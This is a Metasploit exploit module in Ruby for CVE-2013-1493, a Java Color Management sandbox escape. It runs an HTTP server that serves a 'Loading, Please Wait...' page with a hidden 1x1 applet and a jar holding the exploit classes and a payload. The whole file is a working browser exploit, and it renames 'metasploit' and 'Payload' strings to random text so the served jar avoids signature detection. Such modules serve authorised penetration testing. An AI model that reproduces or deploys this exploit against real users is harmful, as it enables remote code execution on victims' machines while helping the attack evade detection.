##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
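# Framework core plus the Rex library (HTTP server, jar/zip helpers, rand_text_*).
# Straight quotes: the smart quotes in the pasted copy are a syntax error.
require 'msf/core'
require 'rex'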
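# Browser exploit module for CVE-2013-1493 (Java CMM / Color Management).
#
# The module runs an HTTP server that serves a landing page with a 1x1 applet
# and the applet jar itself. The jar consists of the framework's encoded payload
# jar plus four precompiled exploit classes shipped under
# data/exploits/cve-2013-1493. The applet name and a few recognisable markers
# are randomized per module run / per request (see setup and build_applet_jar).
#
# Note for operators: click-to-play is NOT bypassed (see 'Description'), so
# this only fires after the victim accepts the Java warning.
class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::EXE
  include Msf::Exploit::Remote::BrowserAutopwn

  # The landing page is a plain <applet> tag, no JavaScript is involved.
  autopwn_info({ :javascript => false })

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Java CMM Remote Code Execution',
      'Description'    => %q{
        This module abuses the Color Management classes from a Java Applet to run
        arbitrary Java code outside of the sandbox as exploited in the wild in February
        and March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41
        and earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1
        systems. This exploit doesn't bypass click-to-play, so the user must accept the java
        warning in order to run the malicious applet.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Unknown',      # Vulnerability discovery and Exploit
          'juan vazquez'  # Metasploit module (just ported the published exploit)
        ],
      'References'     =>
        [
          [ 'CVE', '2013-1493' ],
          [ 'OSVDB', '90737' ],
          [ 'BID', '58238' ],
          [ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],
          [ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],
          [ 'URL', 'http://pastie.org/pastes/6581034' ]
        ],
      'Platform'       => [ 'win', 'java' ],
      'Payload'        => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
      'Targets'        =>
        [
          [ 'Generic (Java Payload)',
            {
              'Platform' => 'java',
              'Arch'     => ARCH_JAVA
            }
          ],
          [ 'Windows x86 (Native Payload)',
            {
              'Platform' => 'win',
              'Arch'     => ARCH_X86
            }
          ]
        ],
      # 'DefaultTarget' belongs in the module info hash; the pasted copy had it
      # stranded inside on_request_uri, which does not parse.
      'DefaultTarget'  => 1,
      'DisclosureDate' => 'Mar 01 2013'
    ))
  end

  # Loads the precompiled exploit classes and randomizes the name of the applet
  # entry class, then lets the HTTP server mixin finish its own setup (super).
  def setup
    @init_class           = read_exploit_class('Init.class')
    @leak_class           = read_exploit_class('Leak.class')
    @buffered_image_class = read_exploit_class('MyBufferedImage.class')
    @color_space_class    = read_exploit_class('MyColorSpace.class')

    # The replacement name has exactly the same length as "Init" on purpose:
    # the name lives in length-prefixed constant-pool entries of the compiled
    # class, so a plain byte substitution only stays valid if the size is kept.
    @init_class_name = rand_text_alpha('Init'.length)
    @init_class.gsub!('Init', @init_class_name)

    super
  end

  # Dispatches a request from the victim browser.
  #
  # * anything ending in ".jar" (case-insensitive) gets the applet jar. The
  #   name is deliberately not checked: generate_html picks a fresh random
  #   archive name on every page load, so the jar handler cannot key on it.
  # * a URI ending in "/" gets the landing page (after a payload regeneration).
  # * anything else is redirected to the resource root.
  #
  # @param cli [Rex::Socket] the client connection
  # @param request [Rex::Proto::Http::Request] the incoming request
  def on_request_uri(cli, request)
    print_status("handling request for #{request.uri}")

    case request.uri
    when /\.jar$/i
      send_response(cli, build_applet_jar, { 'Content-Type' => 'application/octet-stream' })
    when /\/$/
      unless regenerate_payload(cli)
        print_error("Failed to generate the payload.")
        send_not_found(cli)
        return
      end
      send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
    else
      send_redirect(cli, get_resource() + '/', '')
    end
  end

  # Builds the jar served to the browser: the encoded payload jar with the
  # four exploit classes added, then the "metasploit"/"Payload" markers in both
  # entry names and entry bytes replaced with random strings of identical
  # length (presumably to keep obvious string signatures out of the served
  # archive). The same-length rule applies as in setup: the markers sit inside
  # length-prefixed class-file structures and must not change size.
  #
  # @return [Rex::Zip::Jar] the jar with a rebuilt manifest
  def build_applet_jar
    jar = payload.encoded_jar
    jar.add_file("#{@init_class_name}.class", @init_class)
    jar.add_file('Leak.class', @leak_class)
    jar.add_file('MyBufferedImage.class', @buffered_image_class)
    jar.add_file('MyColorSpace.class', @color_space_class)

    metasploit_str = rand_text_alpha('metasploit'.length)
    payload_str    = rand_text_alpha('payload'.length)  # same length as "Payload"
    jar.entries.each do |entry|
      entry.name.gsub!('metasploit', metasploit_str)
      entry.name.gsub!('Payload', payload_str)
      entry.data = entry.data.gsub('metasploit', metasploit_str)
      entry.data = entry.data.gsub('Payload', payload_str)
    end

    jar.build_manifest
    jar
  end

  # Landing page: a 1x1 applet whose archive name is random for every page
  # load and whose entry class is the randomized Init class chosen in setup.
  #
  # @return [String] the HTML document
  def generate_html
    html  = %Q|<html><head><title>Loading, Please Wait...</title></head>|
    html << %Q|<body><center><p>Loading, Please Wait...</p></center>|
    html << %Q|<applet archive="#{rand_text_alpha(8)}.jar" code="#{@init_class_name}.class" width="1" height="1">|
    html << %Q|</applet></body></html>|
    html
  end

  private

  # Reads one of the precompiled exploit classes shipped with the framework as
  # raw bytes (binary read: these are class files, no text-mode conversion).
  #
  # @param file_name [String] file name under data/exploits/cve-2013-1493
  # @return [String] the file contents (ASCII-8BIT)
  def read_exploit_class(file_name)
    path = File.join(Msf::Config.install_root, 'data', 'exploits', 'cve-2013-1493', file_name)
    File.binread(path)
  end
end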